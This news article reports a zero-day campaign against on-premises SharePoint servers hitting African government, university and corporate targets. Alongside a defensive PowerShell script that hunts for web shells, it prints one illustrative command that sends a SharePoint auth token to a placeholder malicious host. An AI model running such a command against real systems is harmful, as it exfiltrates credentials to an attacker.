Microsoft SharePoint Server 0-Day Hack Hits African Treasury, Companies, and University

A sophisticated cyberattack exploiting a zero-day vulnerability in Microsoft SharePoint servers has compromised over 400 entities globally, with significant impact across African nations including South Africa and Mauritius.

The attack specifically targets on-premise SharePoint installations, exploiting previously unknown security flaws that allowed threat actors to infiltrate critical infrastructure systems belonging to government agencies, educational institutions, and private corporations.

The malware campaign emerged last week when Dutch cybersecurity firm Eye Security detected the initial wave of breaches.

Unlike typical SharePoint vulnerabilities that affect cloud-hosted instances, this zero-day specifically targets organizations running SharePoint servers on their own infrastructure—a configuration many institutions prefer for enhanced control and security.

The attack vector leverages unauthorized code execution capabilities within SharePoint’s document collaboration framework, enabling attackers to establish persistent access to targeted networks.

Business Insider Africa analysts identified the malware’s sophisticated behavior patterns, noting its ability to remain undetected while exfiltrating sensitive data from compromised systems.

In South Africa alone, victims span multiple sectors including a major automotive manufacturer, several universities, local government entities, and the National Treasury, where malware was discovered on the Infrastructure Reporting Model website.

Infection Mechanism and Technical Analysis

The SharePoint zero-day exploits a remote code execution vulnerability in the server’s authentication mechanism, allowing attackers to bypass standard security controls.

Technical analysis reveals the malware employs a multi-stage payload delivery system:

# Example of potential exploitation vector; $sharepoint_auth_token is a placeholder variable
Invoke-WebRequest -Uri "http://malicious-domain/payload.aspx" `
    -Method POST -Body $sharepoint_auth_token

The attack begins with reconnaissance scans targeting SharePoint farms running vulnerable versions, followed by exploitation of the authentication bypass to inject malicious web shells.
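Since the campaign ends with web shells written to on-premises SharePoint servers, the check a defender wants is a hunt for recently created or modified server-side script files on the SharePoint host, correlated with IIS POST requests to them. The script below is an added example, not code from the article or from Eye Security; the hive and virtual-directory paths are the usual SharePoint 2016/2019 locations and are an assumption to adjust for your farm.

```powershell
# Added example (not from the article): hunt an on-premises SharePoint host for
# recently written .aspx/.ashx/.asmx files and for IIS POST requests to them.
# Paths are assumptions based on default SharePoint 2016/2019 install locations.
$Days    = 14
$Roots   = @(
    'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS',
    'C:\inetpub\wwwroot\wss\VirtualDirectories'
)
$IisLogs = 'C:\inetpub\logs\LogFiles'

function Find-RecentServerScripts {
    param([string[]]$Paths, [int]$Days)
    $cutoff = (Get-Date).AddDays(-$Days)
    foreach ($p in $Paths) {
        if (-not (Test-Path $p)) { continue }
        # Both timestamps matter: a shell may be a new file or an overwritten existing page.
        Get-ChildItem -Path $p -Recurse -File -Include *.aspx, *.ashx, *.asmx -ErrorAction SilentlyContinue |
            Where-Object { $_.CreationTime -ge $cutoff -or $_.LastWriteTime -ge $cutoff } |
            Select-Object Name, FullName, CreationTime, LastWriteTime, Length
    }
}

function Find-PostsToFiles {
    # Parse IIS W3C logs (the '#Fields:' header gives the column order) and
    # return POST requests whose URI ends in one of the given file names.
    param([string]$LogDir, [string[]]$FileNames)
    $fields = $null
    $lines = Get-ChildItem -Path $LogDir -Recurse -Filter *.log -ErrorAction SilentlyContinue | Get-Content
    foreach ($line in $lines) {
        if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\s*', '') -split ' '; continue }
        if ($line -like '#*' -or -not $fields) { continue }
        $cols = $line -split ' '
        $row = @{}
        for ($i = 0; $i -lt $fields.Count -and $i -lt $cols.Count; $i++) { $row[$fields[$i]] = $cols[$i] }
        $leaf = $row['cs-uri-stem'] -replace '^.*/', ''   # file name part of the URI; null-safe
        if ($row['cs-method'] -eq 'POST' -and $FileNames -contains $leaf) {
            [pscustomobject]@{
                Time = "$($row['date']) $($row['time'])"; Client = $row['c-ip']
                Uri  = $row['cs-uri-stem']; Status = $row['sc-status']
            }
        }
    }
}

$suspect = @(Find-RecentServerScripts -Paths $Roots -Days $Days)
$suspect | Format-Table Name, CreationTime, LastWriteTime -AutoSize
if ($suspect.Count -gt 0) {
    Find-PostsToFiles -LogDir $IisLogs -FileNames $suspect.Name | Format-Table -AutoSize
}
```

Cumulative updates also rewrite files under LAYOUTS, so compare the hits against your patch dates before treating a modified file as a shell.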

Microsoft has confirmed the vulnerability affects only on-premise installations, with cloud-hosted SharePoint Online services remaining secure through Microsoft’s managed security infrastructure.
